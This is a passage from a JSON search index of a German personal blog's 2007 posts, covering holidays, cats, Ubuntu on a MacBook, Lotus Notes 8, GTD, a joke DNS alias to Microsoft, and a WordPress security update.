src=\"/images/2007/09/screenshot_02.png\"\u003e\u003c/a\u003e\n\u003c/figure\u003e","ref":"https://stoeps.de/posts/2007/2007-09-17-mindmapper-ist-seiner-zeit-voraus/","title":"MindMapper ist seiner Zeit voraus"},{"body":"So, mein Urlaub ist wieder beendet. In den nächsten Tagen werden also wieder mehr Postings hier erscheinen. Bis dahin ein paar Urlaubsfotos.\nWir waren dieses Jahr in Regensburg, Passau, Landshut und auf dem Chiemsee. Da es uns die 2. Urlaubswoche komplett verregnet hat und in der ersten Woche ein Speicher auszuräumen war, haben wir nur ein paar Ausflüge machen können.\nHier ein paar Stationen unserer Ausflüge.\nhttps://www.stoeps.de/v/urlaub2007/IMG_3310.jpg.html https://www.stoeps.de/v/urlaub2007/IMG _3317.jpg.html[]https://www.stoeps.de/v/urlaub2007/IMG_3314.jpg.html Passau Eine nette Stadt, die mich vorallem wegen der günstigen Preise und der netten Altstadt beeindruckt hat.\nFraueninsel Seit letzter Woche ist Hochwasser am Chiemsee. Der Wasserstand erreichte annähernd die Marke von 1991. Wir haben trotzdem die Fraueninsel besucht, allerdings konnte man den Weg um die Insel nicht benutzen.\nhttps://www.stoeps.de/v/urlaub2007/IMG_3339.jpg.html https://www.stoeps.de/v/urlaub2007/IMG _3366.jpg.html[]https://www.stoeps.de/v/urlaub2007/IMG_3365.jpg.html https://www.stoeps.de/v/urlaub2007/IMG_3372.jpg.html https://www.stoeps.de/v/urlaub2007/IMG _3369.jpg.html[]\nHerreninsel Nach fast 30 Jahren war ich wieder einmal im Königsschloß auf der Herreninsel.\nhttps://www.stoeps.de/v/urlaub2007/IMG_3378.jpg.html https://www.stoeps.de/v/urlaub2007/IMG _3375.jpg.html[]https://www.stoeps.de/v/urlaub2007/IMG_3376.jpg.html Wasserburg leuchtet Gestern waren wir abends mit den Bielmeiers in Wasserburg bei “Wasserburg leuchtet”. Fotos und kurzen Bericht gibt’s beim Flo .\n","excerpt":"\u003cp\u003eSo, mein Urlaub ist wieder beendet. In den nächsten Tagen werden also\nwieder mehr Postings hier erscheinen. Bis dahin ein paar Urlaubsfotos.\u003c/p\u003e\n\u003cp\u003eWir waren dieses Jahr in Regensburg, Passau, Landshut und auf dem\nChiemsee. Da es uns die 2. Urlaubswoche komplett verregnet hat und in\nder ersten Woche ein Speicher auszuräumen war, haben wir nur ein paar\nAusflüge machen können.\u003c/p\u003e\n\u003cp\u003eHier ein paar Stationen unserer Ausflüge.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://www.stoeps.de/v/urlaub2007/IMG_3310.jpg.html\" target=\"_blank\"\u003ehttps://www.stoeps.de/v/urlaub2007/IMG_3310.jpg.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003ca href=\"https://www.stoeps.de/v/urlaub2007/IMG\" target=\"_blank\"\u003ehttps://www.stoeps.de/v/urlaub2007/IMG \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n_3317.jpg.html[]\u003ca href=\"https://www.stoeps.de/v/urlaub2007/IMG_3314.jpg.html\" target=\"_blank\"\u003ehttps://www.stoeps.de/v/urlaub2007/IMG_3314.jpg.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"passau\"\u003ePassau \u003ca href=\"#passau\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eEine nette Stadt, die mich vorallem wegen der günstigen Preise und der\nnetten Altstadt beeindruckt hat.\u003c/p\u003e\n\u003ch1 id=\"fraueninsel\"\u003eFraueninsel \u003ca href=\"#fraueninsel\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eSeit letzter Woche ist Hochwasser am Chiemsee. Der Wasserstand erreichte\nannähernd die Marke von 1991. Wir haben trotzdem die Fraueninsel\nbesucht, allerdings konnte man den Weg um die Insel nicht benutzen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-09-15-urlaub-beendet/","title":"Urlaub beendet"},{"body":"Unter dem Vorwand, sich schützen zu wollen, wirft sich der Rechtsstaat dem ­Monstrum Terrorismus zum Frass vor.Von Heribert Prantl Der Terrorist als Gesetzgeber – NZZ Folio 09/07 – Thema: Sicherheit\nEin wirklich interessanter Artikel zum Thema Terrorismus. Wieviele Rechte wollen wir noch aufgeben, ohne uns zu rühren? Leider kann ich Sonntag nicht auf die Demo nach Berlin, aber ich hoffe daß viele Andere hinfahren und Stellung beziehen.\nTags: sicherheitrechte terrorismus\n","excerpt":"\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eUnter dem Vorwand, sich schützen zu wollen, wirft sich der Rechtsstaat dem ­Monstrum Terrorismus zum Frass vor.Von Heribert Prantl\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eDer Terrorist als Gesetzgeber – NZZ Folio 09/07 – Thema: Sicherheit\u003c/p\u003e\n\u003cp\u003eEin wirklich interessanter Artikel zum Thema Terrorismus. Wieviele\nRechte wollen wir noch aufgeben, ohne uns zu rühren? Leider kann ich\nSonntag nicht auf die Demo nach Berlin, aber ich hoffe daß viele Andere\nhinfahren und Stellung beziehen.\u003c/p\u003e\n\u003cp\u003eTags: sicherheitrechte terrorismus\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-09-07-der-terrorist-als-gesetzgeber-nzz-folio-0907-thema-sicherheit/","title":"Der Terrorist als Gesetzgeber – NZZ Folio"},{"body":"Irgendwie ist das jetzt bereits das zweite Jahr, in dem ich kein besonders glückliches Händchen mit dem Wetter während meines Urlaubs habe.\nNaja, halb so wild, dann kann ich vielleicht schon am Wochenende die ersten Hechte schleppen. :-)\n","excerpt":"\u003cp\u003eIrgendwie ist das jetzt bereits das zweite Jahr, in dem ich kein\nbesonders glückliches Händchen mit dem Wetter während meines Urlaubs\nhabe.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"http://wp.stoeps.de/wp-content/uploads/2007/09/bild-1.png\" alt=\"Wetter 5.9.2007\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eNaja, halb so wild, dann kann ich vielleicht schon am Wochenende die\nersten Hechte schleppen. :-)\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-09-05-urlaub-bei-12c/","title":"Urlaub bei 12°C"},{"body":"So, die aktuellen Sourcen funktionieren auch unter Gutsy Gibbon. Sprich meine WLAN-Karte am Macbook funktioniert jetzt endlich. Genauere Anleitung findet ihr im Wiki .\nHier ist noch der Link zur offiziellen Bugmeldung .\n","excerpt":"\u003cp\u003eSo, die aktuellen Sourcen funktionieren auch unter Gutsy Gibbon. Sprich\nmeine WLAN-Karte am Macbook funktioniert jetzt endlich.\n\u003ca href=\"http://wiki.stoeps.de/doku.php/linux/ubuntu_gibbon\" target=\"_blank\"\u003eGenauere Anleitung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nfindet ihr im \u003ca href=\"http://wiki.stoeps.de\" target=\"_blank\"\u003eWiki \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eHier ist noch der Link zur\n\u003ca href=\"https://bugs.launchpad.net/ubuntu/\u0026#43;source/linux-source-2.6.22/\u0026#43;bug/125919\" target=\"_blank\"\u003eoffiziellen\nBugmeldung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-30-madwifi-unter-gutsy-gibbon/","title":"Madwifi unter Gutsy Gibbon"},{"body":"Nachdem ich die Linuxpartition am Macbook fast ausschliesslich für Tests verwende, habe ich jetzt Ubuntu 7.10 “Gutsy Gibbon” Tribe4 installiert.\nEs lief fast alles auf anhieb. Die Tastatur war diesmal richtig und \u0026lt;\u0026gt; und ^° waren nicht vertauscht. Ausserdem wurde das Display mit 1280×800 gleich erkannt und eingestellt. Allerdings funktioniert in meiner Version die Madwifi -Module nicht.\nIch habe die Module dann aus den Quellen nachgebaut, aber auch konnte ich die WLAN-Karte nicht aktivieren.\nIm Moment läuft das Update auf Tribe5 und ich hoffe, daß dann die Madwifi-Module funktionieren.\nNeue Funktionen Aufgefallen sind mir gleich am Anfang die neue Gnome 2.19.90. Hier ist vorallem der Benutzer-Switcher ganz witzig. Mir ist zwar noch nicht direkt der Sinn dafür aufgegangen, aber ich denke für verschiedene Testszenarien ist das ganz praktisch.\nGimp 2.3 sieht etwas aufgeräumter und durch die neuen Icons auch mehr up-to-date aus.\nWeitere Neuerungen findet man auf den Projektseiten zu Gutsy Gibbon. Ich blogge dann die nächsten Tage, ob die WLAN-Karte mit Tribe5 funktioniert.\n","excerpt":"\u003cp\u003eNachdem ich die Linuxpartition am\n\u003ca href=\"http://www.apple.com/de/macbook/macbook.html\" target=\"_blank\"\u003eMacbook \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n fast\nausschliesslich für Tests verwende, habe ich jetzt\n\u003ca href=\"http://www.ubuntu.com/testing/tribe4\" target=\"_blank\"\u003eUbuntu 7.10 “Gutsy Gibbon” Tribe4 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\ninstalliert.\u003c/p\u003e\n\u003cp\u003eEs lief fast alles auf anhieb. Die Tastatur war diesmal richtig und \u0026lt;\u0026gt;\nund ^° waren nicht vertauscht. Ausserdem wurde das Display mit 1280×800\ngleich erkannt und eingestellt. Allerdings funktioniert in meiner\nVersion die \u003ca href=\"http://www.madwifi.org\" target=\"_blank\"\u003eMadwifi \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n-Module nicht.\u003c/p\u003e\n\u003cp\u003eIch habe die Module dann aus den Quellen nachgebaut, aber auch konnte\nich die WLAN-Karte nicht aktivieren.\u003c/p\u003e\n\u003cp\u003eIm Moment läuft das Update auf\n\u003ca href=\"http://www.ubuntu.com/testing/tribe5\" target=\"_blank\"\u003eTribe5 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n und ich hoffe, daß dann die\nMadwifi-Module funktionieren.\u003c/p\u003e\n\u003ch1 id=\"neue-funktionen\"\u003eNeue Funktionen \u003ca href=\"#neue-funktionen\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eAufgefallen sind mir gleich am Anfang die neue Gnome 2.19.90. Hier ist\nvorallem der Benutzer-Switcher ganz witzig. Mir ist zwar noch nicht\ndirekt der Sinn dafür aufgegangen, aber ich denke für verschiedene\nTestszenarien ist das ganz praktisch.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-29-ubuntu-gutsy-gibbon-am-macbook/","title":"Ubuntu Gutsy Gibbon am MacBook"},{"body":"So, jetzt hab ich es endlich geschafft, mal wieder ein paar Fotos von unseren beiden Katern in die Gallery einzufügen.\nVito gehts übrigens prächtig. Er hat alle Kinderkrankheiten (Zecken, Virus etc.) überstanden und unterhält jetzt die ganze Familie. Mohrle schaut zwar machmal gequält, weil er jetzt nicht mehr ganz soviel Schlaf bekommt, aber ansonsten passt er gut auf den Kleinen auf und zeigt ihm auch immer wieder verschiedene Angriffstechniken, oder neue Wege zum Anschleichen an die Spielzeugmäuse.\n450\n447\n444\n","excerpt":"\u003cp\u003eSo, jetzt hab ich es endlich geschafft, mal wieder ein paar Fotos von\nunseren beiden Katern in die Gallery einzufügen.\u003c/p\u003e\n\u003cp\u003eVito gehts übrigens prächtig. Er hat alle Kinderkrankheiten (Zecken,\nVirus etc.) überstanden und unterhält jetzt die ganze Familie. Mohrle\nschaut zwar machmal gequält, weil er jetzt nicht mehr ganz soviel Schlaf\nbekommt, aber ansonsten passt er gut auf den Kleinen auf und zeigt ihm\nauch immer wieder verschiedene Angriffstechniken, oder neue Wege zum\nAnschleichen an die Spielzeugmäuse.\u003c/p\u003e\n\u003cp\u003e450\u003c/p\u003e\n\u003cp\u003e447\u003c/p\u003e\n\u003cp\u003e444\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-23-neue-fotos-von-vito/","title":"Neue Fotos von Vito"},{"body":"IBM hat ein Online Tutorial “ftp://ftp.software.ibm.com/software/lotus/idc/N8120/index.htm[Exploring new Features]” zum Interface von Lotus Notes 8 veröffentlicht.\nEs wird darin der Vollclient und nicht der Basic-Client beschrieben. Ich habe beide Clients testweise installiert und fand den Vollclient, sowie die Productive Tools wirklich cool, die Geschwindigkeit auf meinem Rechner lies allerdings zu Wünschen übrig.\nIch arbeite gerade mit dem Notes 8 Basic Client und den finde ich eigentlich auch sehr schön, selbst wenn sich gegen die Version 7 nicht allzuviel geändert hat.\nVorschau des Tutorials:\nvia Madicon ","excerpt":"\u003cp\u003eIBM hat ein Online Tutorial\n“ftp://ftp.software.ibm.com/software/lotus/idc/N8120/index.htm[Exploring\nnew Features]” zum Interface von Lotus Notes 8 veröffentlicht.\u003c/p\u003e\n\u003cp\u003eEs wird darin der Vollclient und nicht der Basic-Client beschrieben. Ich\nhabe beide Clients testweise installiert und fand den Vollclient, sowie\ndie Productive Tools wirklich cool, die Geschwindigkeit auf meinem\nRechner lies allerdings zu Wünschen übrig.\u003c/p\u003e\n\u003cp\u003eIch arbeite gerade mit dem Notes 8 Basic Client und den finde ich\neigentlich auch sehr schön, selbst wenn sich gegen die Version 7 nicht\nallzuviel geändert hat.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eVorschau des Tutorials:\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2007/08/2007-08-23_131618.jpg\" target=\"_blank\"\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"http://wp.stoeps.de/wp-content/uploads/2007/08/2007-08-23_131618-150x150.jpg\" alt=\"Online Tutorial zu Notes 8\" /\u003e\n\u003c/p\u003e\n\n \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003evia\n\u003ca href=\"http://www.madicon.de/index_files/0000163.php#unique-entry-id-65\" target=\"_blank\"\u003eMadicon \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-23-online-tutorial-zu-notes-8/","title":"Online Tutorial zu Notes 8"},{"body":"Im Moment ist es ein bisschen ruhiger hier, da ich mich auf meinen Jobwechsel vorbereite und nebenbei ein paar Bücher über Zeitmanagement und GTD lese. Hier mal der erste Artikel zu diesen Büchern und ein paar Anmerkungen von mir.\nGetting Things Done von David Allen ist für viele Leute die Bibel für stressfreies Arbeiten und die Erledigung sämtlicher notwendiger Dinge.\nKann man mit einem solchen System auch als System- und Netzwerkadministrator besser arbeiten?\nIch habe vor kurzem das Buch “http://www.amazon.de/Zeitmanagement-f%C3%BCr-Systemadministratoren-Thomas-Limoncelli/dp/3897214652/ref=pd_bbs_sr_1/028-7030706-3114113?ie=UTF8\u0026amp;s=books\u0026amp;qid=1185637979\u0026amp;sr=8-1[Zeitmanagement für Systemadministratoren]” von Thomas A. Limoncelli gelesen. Es ein paar gute Tipps dabei, die ich auch umsetzen konnte. Allerdings fand ich hier in Grundzügen die Techniken von David Allen wieder. Ich möchte mir jetzt ein Bild von GTD machen und habe dazu verschiedene Internetlinks zusammengetragen und werde ab Montag mal die Bücher selbst lesen.\nViele der gefundenen Links zeigen Programme, die für Mac OS X geschrieben sind. Ich bin mir noch nicht sicher, ob Mac-User für die GTD-Techniken besser geeignet sind, oder ob das andere Gründe hat.\nWas ist GTD? Das Wichtigste ist, den Kopf frei zu bekommen und daher alles aufzuschreiben, das einem in den Sinn kommt.\nWo man das am Besten aufschreibt, ist an sich egal. Viele Leute benutzen Moleskine-Notizbücher, normale Notizbücher, PDAs oder ähnliches.\nGTD mit Lotus Notes und Pocket PC Ich versuche jetzt die Techniken mit meinem vorhandenen Pocket PC und Lotus Notes umzusetzen. Eine zusätzliche Software halte ich im Moment nicht für angebracht.\nLinks Getting Things Done von David Allen ","excerpt":"\u003cp\u003eIm Moment ist es ein bisschen ruhiger hier, da ich mich auf meinen\nJobwechsel vorbereite und nebenbei ein paar Bücher über Zeitmanagement\nund GTD lese. Hier mal der erste Artikel zu diesen Büchern und ein paar\nAnmerkungen von mir.\u003c/p\u003e\n\u003cp\u003eGetting Things Done von David Allen ist für viele Leute die Bibel für\nstressfreies Arbeiten und die Erledigung sämtlicher notwendiger Dinge.\u003c/p\u003e\n\u003cp\u003eKann man mit einem solchen System auch als System- und\nNetzwerkadministrator besser arbeiten?\u003c/p\u003e\n\u003cp\u003eIch habe vor kurzem das Buch\n“http://www.amazon.de/Zeitmanagement-f%C3%BCr-Systemadministratoren-Thomas-Limoncelli/dp/3897214652/ref=pd_bbs_sr_1/028-7030706-3114113?ie=UTF8\u0026amp;s=books\u0026amp;qid=1185637979\u0026amp;sr=8-1[Zeitmanagement\nfür Systemadministratoren]” von Thomas A. Limoncelli gelesen. Es ein\npaar gute Tipps dabei, die ich auch umsetzen konnte. Allerdings fand ich\nhier in Grundzügen die Techniken von David Allen wieder. Ich möchte mir\njetzt ein Bild von GTD machen und habe dazu verschiedene Internetlinks\nzusammengetragen und werde ab Montag mal die Bücher selbst lesen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-19-funktioniert-gtd/","title":"Funktioniert GTD?"},{"body":"Lustig finde ich die Bildzeitung, die bereits jetzt den neuen Kontinent unter der Arktis unter den Anliegerländern aufteilt.\n","excerpt":"\u003cp\u003eLustig finde ich die Bildzeitung, die bereits jetzt den\n\u003ca href=\"http://www.bildblog.de/2423/bild-taucht-mit-neuem-kontinent-auf\" target=\"_blank\"\u003eneuen\nKontinent unter der Arktis \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n unter den Anliegerländern aufteilt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-14-open-air-kino-und-der-kontinent-unter-der-arktis/","title":"Der Kontinent unter der Arktis"},{"body":"Verschärfte Hackerparagraphen treten in Kraft Meldung vorlesenMit der Veröffentlichung der neuen Strafvorschriften zur \u0026amp;#8220;Bekämpfung der Computerkriminalität\u0026amp;#8221; (PDF-Datei) im Bundesgesetzblatt am heutigen Freitag erlangen die heftig umstrittenen Regelungen bereits vom morgigen Samstag an Gültigkeit. heise online – Verschärfte Hackerparagraphen treten in Kraft\nNa toll, damit ist also dieses Wunderwerk an Paragraph gültig. Ich bin immer noch der Meinung, daß es nicht richtig ist, den Paragraphen über ein Zusatzwerk einzuschränken. Wir haben einen gewaltengeteilten Staat und damit kann normalerweise das gesetzgebende Organ der Judikative nicht vorschreiben, wie ein Gesetz auszulegen ist. Es zählt allein der Wortlaut.\n","excerpt":"\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eVerschärfte Hackerparagraphen treten in Kraft Meldung vorlesenMit der Veröffentlichung der neuen Strafvorschriften zur \u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8220;Bekämpfung der Computerkriminalität\u0026amp;#8221; (PDF-Datei) im Bundesgesetzblatt am heutigen Freitag erlangen die heftig umstrittenen Regelungen bereits vom morgigen Samstag an Gültigkeit.\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eheise online – Verschärfte Hackerparagraphen treten in Kraft\u003c/p\u003e\n\u003cp\u003eNa toll, damit ist also dieses Wunderwerk an Paragraph gültig. Ich bin\nimmer noch der Meinung, daß es nicht richtig ist, den Paragraphen über\nein Zusatzwerk einzuschränken. Wir haben einen gewaltengeteilten Staat\nund damit kann normalerweise das gesetzgebende Organ der Judikative\nnicht vorschreiben, wie ein Gesetz auszulegen ist. Es zählt allein der\nWortlaut.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-10-heise-online-verscharfte-hackerparagraphen-treten-in-kraft/","title":"heise online – Verschärfte Hackerparagraphen treten in Kraft"},{"body":"Heute habe ich das Theme des Blog gewechselt. Ich konnte die Farben nicht mehr sehen.\nDas neue Theme ist von N.Design Studio und wurde von MangoOrange in mehrspaltig geändert.\nCool finde ich die Widgets und daß man dadurch die Seitenspalten sehr schnell umgestalten kann.\nNoch ist nicht alles eingedeutscht, ich denke aber, daß das unproblematisch ist. Außerdem überlege ich, ob ich diesen Blog auf englisch umstellen sollte. Noch bin ich zu keiner Entscheidung gekommen. Mal sehen…\nIch hoffe euch gefällt der neue Look des Blogs. Über Kommentare bin ich immer dankbar.\n","excerpt":"\u003cp\u003eHeute habe ich das Theme des Blog gewechselt. Ich konnte die Farben\nnicht mehr sehen.\u003c/p\u003e\n\u003cp\u003eDas \u003ca href=\"http://www.mangoorange.com/resources/i3theme\" target=\"_blank\"\u003eneue Theme \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n ist von\n\u003ca href=\"http://www.ndesign-studio.com/\" target=\"_blank\"\u003eN.Design Studio \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n und wurde von\n\u003ca href=\"http://www.mangoorange.com/\" target=\"_blank\"\u003eMangoOrange \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in mehrspaltig geändert.\u003c/p\u003e\n\u003cp\u003eCool finde ich die Widgets und daß man dadurch die Seitenspalten sehr\nschnell umgestalten kann.\u003c/p\u003e\n\u003cp\u003eNoch ist nicht alles eingedeutscht, ich denke aber, daß das\nunproblematisch ist. Außerdem überlege ich, ob ich diesen Blog auf\nenglisch umstellen sollte. Noch bin ich zu keiner Entscheidung gekommen.\nMal sehen…\u003c/p\u003e\n\u003cp\u003eIch hoffe euch gefällt der neue Look des Blogs. Über Kommentare bin ich\nimmer dankbar.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-07-neues-theme/","title":"Neues Theme"},{"body":"Heute bin ich über folgenden Link gestolpert: http://thesource.ofallevil.com/ Ich wollte natürlich testen, wo man da hinkommt und dann dachte ich erstmal an eine Phishing-Seite!\nIch hab dann mal bei DNSstuff.com recherchiert und u.a. erfahren, daß die URI ein CNAME zu Microsoft.com ist. Leider finde ich nicht, wem sie gehört.\nHier die Antwort von DNSstuff:\nThe parent servers say that the domain thesource.ofallevil.com is a CNAME for www.microsoft.com . I can not do a DNS report on a hostname (such as mail.example.com) or a domain name that does not have its own zone.\nDie Adresse gibt es schon seit längerem, aber vielleicht kennt ihr sie ja auch noch nicht.\nDie Aktion ist natürlich nicht unproblematisch. In diesem Fall ist es zwar ein CNAME-Eintrag, also im Prinzip ein Alias, aber diese Spaßvögel können natürlich jederzeit einen A-Record aus dem Eintrag machen, die Seite von Microsoft kopieren und Phishing-Content unterschieben.\n","excerpt":"\u003cp\u003eHeute bin ich über folgenden Link gestolpert:\n\u003ca href=\"http://thesource.ofallevil.com/\" target=\"_blank\"\u003ehttp://thesource.ofallevil.com/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eIch wollte natürlich testen, wo man da hinkommt und dann dachte ich\nerstmal an eine Phishing-Seite!\u003c/p\u003e\n\u003cp\u003eIch hab dann mal bei \u003ca href=\"http://www.dnsstuff.com\" target=\"_blank\"\u003eDNSstuff.com \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n recherchiert\nund u.a. erfahren, daß die URI ein CNAME zu Microsoft.com ist. Leider\nfinde ich nicht, wem sie gehört.\u003c/p\u003e\n\u003cp\u003eHier die Antwort von DNSstuff:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThe parent servers say that the domain thesource.ofallevil.com is a\nCNAME for \u003ca href=\"https://www.microsoft.com\" target=\"_blank\"\u003ewww.microsoft.com \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. I can not do a DNS report on a hostname\n(such as mail.example.com) or a domain name that does not have its own\nzone.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eDie Adresse gibt es schon seit längerem, aber vielleicht kennt ihr sie\nja auch noch nicht.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-06-witzige-dns-spielchen/","title":"Witzige DNS Spielchen"},{"body":"Ich habe den Yigg-Button in meinem Blog jetzt deaktiviert. Die Ladezeit während der letzten Stunde ging gegen unendlich. Die Posts öffneten sich nicht mehr, in der Statusleiste zeigte sich nur: “Öffne webtools.yigg.de”.\n","excerpt":"\u003cp\u003eIch habe den Yigg-Button in meinem Blog jetzt deaktiviert. Die Ladezeit\nwährend der letzten Stunde ging gegen unendlich. Die Posts öffneten sich\nnicht mehr, in der Statusleiste zeigte sich nur: “Öffne\nwebtools.yigg.de”.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-05-probleme-mit-dem-yigg-button/","title":"Probleme mit dem Yigg-Button"},{"body":"Wir haben das Wochenende genutzt um mit Freunden Steckerlfisch esssen zu gehen. Wie immer war die Steckerlfisch-http://de.wikipedia.org/wiki/Coregonus[Renke] ein Genuß und die frischgebackenen Brezn, sowie der hausgemachte Kartoffelsalat eine Sünde wert. Wer sich also in der Nähe von Prien oder dem Chiemsee befindet empfehle ich den Biergarten vom “http://www.winklfischer.de[Winklfischer]” zu besuchen.\nDer Biergarten liegt direkt am See, und für Schatten und Getränke ist immer gesorgt.\nWordPress-Update 2.2.2 Seit ein paar Minuten gibt es das deutsche Update 2.2.2 für WordPress . Wer die XSS-Lücken nicht manuell gepatcht hat, sollte unbedingt das Update einspielen.\nWiki Ich habe diese Woche meine Docuwiki Installation auf den aktuellen Stand gebracht und ein neues Template installiert. Ich werde nicht mehr ausschließlich Lotus Notes Themen im Wiki schreiben, sondern alle Anleitungen die mir in meiner beruflichen Tätigkeit unterkommen, direkt ins Wiki schreiben, oder zumindest die Blogeinträge dort verlinken.\nDas Notestutorial ist damit für mich endgültig gestorben. Ich stelle die letzte Version (2003) als PDF weiter zum Download zur Verfügung und freue mich, wenn andere Autoren im Wiki posten, ich stecke aber keine weitere Energie in dieses Tutorial.\n","excerpt":"\u003cp\u003eWir haben das Wochenende genutzt um mit Freunden\n\u003ca href=\"http://de.wikipedia.org/wiki/Steckerlfisch\" target=\"_blank\"\u003eSteckerlfisch \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n esssen zu\ngehen. Wie immer war die\nSteckerlfisch-http://de.wikipedia.org/wiki/Coregonus[Renke] ein Genuß\nund die frischgebackenen Brezn, sowie der hausgemachte Kartoffelsalat\neine Sünde wert. Wer sich also in der Nähe von Prien oder dem Chiemsee\nbefindet empfehle ich den Biergarten vom\n“http://www.winklfischer.de[Winklfischer]” zu besuchen.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2007/08/steckerlfisch.jpg\" target=\"_blank\"\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"http://wp.stoeps.de/wp-content/uploads/2007/08/steckerlfisch-150x150.jpg\" alt=\"Steckerlfisch am Chiemsee\" /\u003e\n\u003c/p\u003e\n\n \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eDer Biergarten liegt direkt am See, und für Schatten und Getränke ist\nimmer gesorgt.\u003c/p\u003e\n\u003ch1 id=\"wordpress-update-222\"\u003eWordPress-Update 2.2.2 \u003ca href=\"#wordpress-update-222\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eSeit ein paar Minuten gibt es das\n\u003ca href=\"http://blog.wordpress-deutschland.org/2007/08/05/wordpress-222-und-2011de-editionen.html\" target=\"_blank\"\u003edeutsche\nUpdate 2.2.2 für WordPress \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Wer die XSS-Lücken nicht\n\u003ca href=\"https://www.stoeps.de/2007/08/02/xss-wurm-fur-wordpress/\" target=\"_blank\"\u003emanuell gepatcht\nhat, \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n sollte unbedingt das Update einspielen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-05-wochenende/","title":"Wochenende – Steckerlfisch, DocuWiki und WordPress"},{"body":"Law Podcasting – Das erste deutsche Anwalts-Audio-Blog – Kanzlei Dr. Bahr :\nIst das Setzen von Links auf fremde Seiten ohne Erlaubnis des Seiteninhabers erlaubt? 